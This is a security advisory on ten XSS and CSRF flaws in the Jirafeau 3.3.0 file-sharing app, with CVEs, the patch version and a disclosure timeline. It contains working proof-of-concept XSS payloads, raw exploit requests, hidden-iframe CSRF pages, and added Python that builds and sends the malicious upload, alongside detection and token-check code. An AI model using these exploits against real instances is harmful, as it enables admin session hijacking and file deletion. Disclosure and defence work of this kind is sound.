Release Date (Vendor Patch)
May 11, 2018
Reported Date
May 3, 2018
Vendor
Jirafeau
Version Affected
3.3.0
Summary
Jirafeau is an open source file sharing web application, distributed under the AGPL version 3 license. It is a fork of the Jyraphe project and allows users to share files for a defined period and to protect downloads with a password. The project's official website is gitlab.com/mojo42/Jirafeau. At the time of testing, the latest version of the application was 3.3.0, released on September 8, 2017. Ten vulnerabilities were identified in the Jirafeau web application: five cross-site scripting vulnerabilities (two stored and three reflected) and five cross-site request forgery vulnerabilities.
Vendor Status
The vendor has been notified and, as of May 11, 2018, the patched version 3.4.1 has been released. Please update to this version if you haven't already.
Stored Cross-site Scripting (CVE-2018-11351)
The Jirafeau web application was affected by two stored cross-site scripting (XSS) vulnerabilities. The injected payloads are written to the per-file description that Jirafeau stores alongside each uploaded file, and they execute each time an administrator searches or lists uploaded files in the admin panel. No authentication is needed to plant the payload, so an anonymous uploader could target administrators and steal their sessions.
Vulnerability Details
CVE ID: CVE-2018-11351
Access Vector: Remote
Security Risk: Critical
Vulnerability: CWE-79
CVSS Base Score: 9.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Two XSS vulnerabilities are located in the file upload form (/script.php) and are triggered in the admin panel (/admin.php). By injecting JavaScript payloads through the file upload form, an attacker could hijack an administrator's session and gain admin access to the application. No authentication is required for exploitation. The weak parameters are the Content-Type and filename of the uploaded file part.
To demonstrate the attack, the following payload could be used for the Content-Type parameter:
<script>alert(/XSS/)</script>
The following payload could be used for the filename parameter:
/<script>alert(/XSS/)</script>
The request below could be used to exploit the vulnerabilities:
POST /script.php HTTP/1.1
Host: HOST
Content-Type: multipart/form-data; boundary=---------------------------BOUNDARYID

-----------------------------BOUNDARYID
Content-Disposition: form-data; name="file"; filename="/<script>alert(/XSS/)</script>file.png"
Content-Type: <script>alert(/XSS/)</script>

DATA
-----------------------------BOUNDARYID
Content-Disposition: form-data; name="time"

month
-----------------------------BOUNDARYID
Content-Disposition: form-data; name="key"

password
-----------------------------BOUNDARYID--
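The request above can be reproduced with the following Python script, an added example that is not part of the Bishop Fox advisory or of Jirafeau. It builds the multipart body by hand because standard upload helpers will not let you put arbitrary text into a part's filename and Content-Type, which is exactly where the two injection points are. The host, the default field values ("month", "password", "DATA") and the send_upload helper are assumptions for illustration.

```python
import http.client
import uuid

# Payload taken from the advisory; it lands in the stored filename and MIME type
# and fires when admin.php prints them without HTML encoding.
XSS_PAYLOAD = "<script>alert(/XSS/)</script>"


def build_multipart(boundary, file_part, fields):
    """Hand-build a multipart/form-data body.

    file_part is (field_name, filename, content_type, data); fields holds the
    plain text parts in order. Building the body ourselves lets us place
    arbitrary text in the part's filename and Content-Type.
    """
    name, filename, content_type, data = file_part
    lines = [
        f"--{boundary}".encode(),
        f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'.encode(),
        f"Content-Type: {content_type}".encode(),
        b"",
        data,
    ]
    for key, value in fields.items():
        lines += [
            f"--{boundary}".encode(),
            f'Content-Disposition: form-data; name="{key}"'.encode(),
            b"",
            value.encode(),
        ]
    lines += [f"--{boundary}--".encode(), b""]
    return b"\r\n".join(lines)


def build_upload(filename="file.png", data=b"DATA", time="month", key="password",
                 inject=True, boundary=None):
    """Return (headers, body) for a POST to /script.php.

    With inject=True both weak parameters carry the payload as in the advisory:
    the filename is prefixed with the payload and the part Content-Type is
    replaced by it outright. inject=False builds a benign upload for comparison.
    """
    boundary = boundary or uuid.uuid4().hex
    if inject:
        filename = "/" + XSS_PAYLOAD + filename
        content_type = XSS_PAYLOAD
    else:
        content_type = "image/png"  # assumed benign MIME type
    body = build_multipart(boundary, ("file", filename, content_type, data),
                           {"time": time, "key": key})
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
    }
    return headers, body


def send_upload(host, **kwargs):
    """Send the upload to http://host/script.php and return (status, body).

    This performs a live request; only use it against an instance you are
    authorised to test.
    """
    headers, body = build_upload(**kwargs)
    conn = http.client.HTTPConnection(host, timeout=10)
    conn.request("POST", "/script.php", body=body, headers=headers)
    resp = conn.getresponse()
    return resp.status, resp.read().decode(errors="replace")


if __name__ == "__main__":
    hdrs, raw = build_upload(boundary="BOUNDARYID")
    print(hdrs["Content-Type"])
    print(raw.decode())
```

After the upload, the check is simply to open the admin panel's file listing as an administrator: on 3.3.0 the alert fires, on 3.4.1 the filename and MIME type should appear HTML-encoded.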
Reflected Cross-site Scripting
(CVE-2018-11350, CVE-2018-13408, CVE-2018-13409)
The Jirafeau web application is affected by three reflected cross-site scripting (XSS) vulnerabilities that require user interaction to be executed.
Vulnerability Details
CVE ID: CVE-2018-11350, CVE-2018-13408, CVE-2018-13409
Access Vector: Remote
Security Risk: Medium
Vulnerability: CWE-79
CVSS Base Score: 6.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H
REFLECTED XSS IN THE SEARCH FILE BY NAME FORM (ADMIN PANEL) (CVE-2018-11350)
The search file by name form is affected by one cross-site scripting vulnerability. By injecting a JavaScript payload into the search file by name form, an attacker could manipulate user sessions. The weak parameter is name. The following payload can be injected into the name parameter to trigger the vulnerability:
<script>alert(/XSS/)</script>
The request below could be used to exploit the vulnerability:
POST /admin.php HTTP/1.1
Host: HOST
Cookie: SESSIONID=SESSIONID; TRACKID=TRACKID; PHPSESSID=SESSIONID2
Content-Type: application/x-www-form-urlencoded

action=search_by_name&name=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
REFLECTED XSS IN THE SEARCH FILE BY HASH FORM (ADMIN PANEL) (CVE-2018-13409)
The search file by hash form is affected by one cross-site scripting vulnerability. By injecting a JavaScript payload into the search file by hash form, an attacker could manipulate user sessions. The weak parameter is hash. The following payload can be injected into the hash parameter to trigger the vulnerability:
<script>alert(/XSS/)</script>
The request below could be used to exploit the vulnerability:
POST /admin.php HTTP/1.1
Host: HOST
Cookie: SESSIONID=SESSIONID; TRACKID=TRACKID; PHPSESSID=SESSIONID2
Content-Type: application/x-www-form-urlencoded

action=search_by_hash&hash=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
REFLECTED XSS IN THE SEARCH FILE BY LINK FORM (ADMIN PANEL) (CVE-2018-13408)
The search file by link form is affected by one cross-site scripting vulnerability. By injecting a JavaScript payload into the search file by link form, an attacker could manipulate user sessions. The weak parameter is link. The following payload can be used for the link parameter to trigger the vulnerability:
<script>alert(/XSS/)</script>
The request below could be used to exploit the vulnerability:
POST /admin.php HTTP/1.1
Host: HOST
Cookie: SESSIONID=SESSIONID; TRACKID=TRACKID; PHPSESSID=SESSIONID2
Content-Type: application/x-www-form-urlencoded

action=search_link&link=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
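All three reflected issues share one shape: a POST to /admin.php with one of three search actions, whose search term is echoed back into the page unencoded. The Python below is an added example (not from the advisory or from Jirafeau) that turns this into a detection check over captured request bodies and shows the output encoding the patched page should apply. The regular expression, the sample requests and the field names it inspects are constructed for illustration; the percent-decoding matches what PHP does once before echoing the value.

```python
import html
import re
from urllib.parse import parse_qs

# admin.php action -> the form field whose value is echoed back into the page.
SEARCH_ACTIONS = {
    "search_by_name": "name",
    "search_by_hash": "hash",
    "search_link": "link",
}

# Coarse markup detector: a tag opener, an inline event handler, or a javascript: URL.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def inspect_admin_post(path, body):
    """Return (action, field, decoded_value) when a POST to /admin.php is one of
    the three search actions and the search term carries markup; else None.

    parse_qs percent-decodes exactly once, as PHP does, so %3Cscript%3E and a
    literal <script> are both caught while a double-encoded %253C is not
    (it would be echoed as harmless text by the server too).
    """
    if path.split("?", 1)[0] != "/admin.php":
        return None
    fields = parse_qs(body, keep_blank_values=True)
    action = fields.get("action", [""])[0]
    field = SEARCH_ACTIONS.get(action)
    if field is None:
        return None
    value = fields.get(field, [""])[0]
    return (action, field, value) if MARKUP.search(value) else None


def scan(requests):
    """Run the check over (path, body) pairs and keep the hits."""
    return [hit for hit in (inspect_admin_post(p, b) for p, b in requests) if hit]


def render_search_term(value):
    """What the page should emit: HTML-encode the term before echoing it."""
    return html.escape(value, quote=True)


# Constructed sample traffic: the three requests from the advisory, a benign
# search, a delete action, and a request to a different script.
SAMPLE_REQUESTS = [
    ("/admin.php", "action=search_by_name&name=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E"),
    ("/admin.php", "action=search_by_hash&hash=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E"),
    ("/admin.php", "action=search_link&link=%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E"),
    ("/admin.php", "action=search_by_name&name=quarterly-report.pdf"),
    ("/admin.php", "action=clean"),
    ("/script.php", "name=%3Cscript%3E"),
]

if __name__ == "__main__":
    for action, field, value in scan(SAMPLE_REQUESTS):
        print(f"{action}: {field}={value!r} -> encoded {render_search_term(value)}")
```

Because POST bodies are not in ordinary access logs, this check belongs in a reverse proxy, WAF, or application-level request logger rather than in log review after the fact.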
Cross-site Request Forgery (CVE-2018-11349 and CVE-2018-13407)
The Jirafeau web application is affected by five cross-site request forgery (CSRF) vulnerabilities that require user interaction to be executed.
Vulnerability Details
CVE ID: CVE-2018-11349, CVE-2018-13407
Access Vector: Remote
Security Risk: High
Vulnerability: CWE-352
CVSS Base Score: 8.8
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CSRF ON SEARCH FILE FUNCTIONALITIES (ADMIN PANEL)
The administration panel is vulnerable to three CSRF attacks on the search file functionalities. The vulnerability could be used to force a logged-in administrator to perform a file search. This CSRF could in turn be used to trigger the reflected XSS vulnerabilities, which otherwise require an authenticated administrator to submit the payload. The reflected XSS vulnerabilities are described in the section above.
This vulnerability could be triggered by driving an administrator logged into the Jirafeau application to a specially crafted web page. The attack could be done silently.
The code snippet below permits the silent exploitation of all three CSRF vulnerabilities by driving a logged-in administrator to the search file page:
<head>
<title>CSRF Jirafeau</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame1"></iframe>
<form id="csrf-form1" action="http://HOST/admin.php" method="POST" target="csrf-frame1">
<input type="text" name="action" value="search_by_name">
<input type="text" name="name" value="PATTERN">
</form>
<script>document.getElementById("csrf-form1").submit()</script>
<iframe style="display:none" name="csrf-frame2"></iframe>
<form id="csrf-form2" action="http://HOST/admin.php" method="POST" target="csrf-frame2">
<input type="text" name="action" value="search_by_hash">
<input type="text" name="hash" value="PATTERN">
</form>
<script>document.getElementById("csrf-form2").submit()</script>
<iframe style="display:none" name="csrf-frame3"></iframe>
<form id="csrf-form3" action="http://HOST/admin.php" method="POST" target="csrf-frame3">
<input type="text" name="action" value="search_link">
<input type="text" name="link" value="PATTERN">
</form>
<script>document.getElementById("csrf-form3").submit()</script>
</body>
CSRF ON DELETE FILE FUNCTIONALITIES (ADMIN PANEL) (CVE-2018-13407)
The administration panel is vulnerable to two CSRF attacks that could be used to force a logged-in administrator to delete files uploaded by other users of the Jirafeau application. The vulnerabilities could be triggered by driving an administrator logged into the Jirafeau application to a specially crafted web page. This attack could be done silently.
The code snippet below can be used to silently exploit both CSRF vulnerabilities by driving a logged-in administrator to use the delete file functionality:
<head>
<title>CSRF Jirafeau</title>
</head>
<body>
<iframe style="display:none" name="csrf-frame1"></iframe>
<form id="csrf-form1" action="http://HOST/admin.php" method="POST" target="csrf-frame1">
<input type="text" name="action" value="clean">
</form>
<script>document.getElementById("csrf-form1").submit()</script>
<iframe style="display:none" name="csrf-frame2"></iframe>
<form id="csrf-form2" action="http://HOST/admin.php" method="POST" target="csrf-frame2">
<input type="text" name="action" value="clean_async">
</form>
<script>document.getElementById("csrf-form2").submit()</script>
</body>
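The five CSRF PoCs above differ only in the form fields they post, and the fix for all of them is the same: a per-session anti-CSRF token that a cross-origin page cannot read. The Python below is an added example, not the advisory's or Jirafeau's code, that generates the hidden-iframe auto-submit page for any list of form bodies (covering both the search and the delete PoCs) and shows, in a hypothetical dispatcher, the token check that makes such a page ineffective. The HOST placeholder, the handle_admin_post dispatcher and its session/form dictionaries are assumptions; the action names are the ones the advisory uses.

```python
import hmac
import secrets
from html import escape

# The form bodies from the two advisory PoCs.
SEARCH_POCS = [
    {"action": "search_by_name", "name": "PATTERN"},
    {"action": "search_by_hash", "hash": "PATTERN"},
    {"action": "search_link", "link": "PATTERN"},
]
DELETE_POCS = [{"action": "clean"}, {"action": "clean_async"}]


def csrf_page(host, submissions, path="/admin.php"):
    """Generate the hidden-iframe auto-submit page used by the advisory PoCs,
    one frame/form pair per submission. Hidden inputs replace the PoCs' text
    inputs; the result is equivalent because the frames are never shown."""
    out = ["<head>", "<title>CSRF Jirafeau</title>", "</head>", "<body>"]
    for i, fields in enumerate(submissions, 1):
        frame, form = f"csrf-frame{i}", f"csrf-form{i}"
        out.append(f'<iframe style="display:none" name="{frame}"></iframe>')
        out.append(f'<form id="{form}" action="http://{host}{path}" '
                   f'method="POST" target="{frame}">')
        for name, value in fields.items():
            out.append(f'<input type="hidden" name="{escape(name, quote=True)}" '
                       f'value="{escape(value, quote=True)}">')
        out.append("</form>")
        out.append(f'<script>document.getElementById("{form}").submit()</script>')
    out.append("</body>")
    return "\n".join(out)


# Defender side (illustrative, not Jirafeau's implementation): a random token
# stored in the server-side session and embedded in every legitimate form.
def new_token():
    return secrets.token_urlsafe(32)


def token_valid(session_token, submitted):
    """Constant-time comparison; missing values on either side fail closed."""
    if not session_token or not submitted:
        return False
    return hmac.compare_digest(session_token, submitted)


def handle_admin_post(session, form):
    """Hypothetical admin.php dispatcher: every POST must carry the session's
    token before any search or delete action runs. A forged cross-site form
    cannot include it, so it is rejected with 403."""
    if not token_valid(session.get("csrf_token"), form.get("csrf_token")):
        return 403, "invalid CSRF token"
    action = form.get("action", "")
    if action in ("clean", "clean_async", "search_by_name", "search_by_hash", "search_link"):
        return 200, f"performed {action}"
    return 400, "unknown action"


if __name__ == "__main__":
    print(csrf_page("HOST", SEARCH_POCS + DELETE_POCS))
```

Two caveats when testing this: the PoC depends on the browser attaching the administrator's PHPSESSID to a cross-site POST, and Chromium-based browsers since version 80 treat cookies without a SameSite attribute as Lax by default, which reduces (but does not eliminate) exposure on unpatched instances; and a token check only helps if it is applied to every state-changing action, including the asynchronous clean_async path.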
Disclosure Timeline
- October 23, 2017: Initial discovery
- April 3, 2018: Contact with vendor
- May 3, 2018: Vendor acknowledged vulnerabilities
- May 11, 2018: Vendor released patched version 3.4.1
- May 28, 2018: Vulnerabilities publicly disclosed
Researcher
Florian Nivette, Security Associate at Bishop Fox